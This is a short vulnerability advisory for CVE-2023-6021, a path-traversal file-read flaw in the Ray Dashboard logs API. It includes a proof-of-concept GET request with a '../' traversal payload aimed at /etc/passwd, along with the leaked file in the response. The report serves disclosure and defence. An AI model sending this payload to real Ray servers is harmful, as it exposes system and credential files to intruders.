CVE-2023-6021: LFI in Ray API in ray

Description

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

Proof of Concept

GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
Host: localhost:8265
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8265/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 24 Aug 2023 21:49:54 GMT
Server: Python/3.8 aiohttp/3.8.5
Connection: close
Content-Length: 8225

1##
# User Database
# 
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico

Impact

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

Occurrences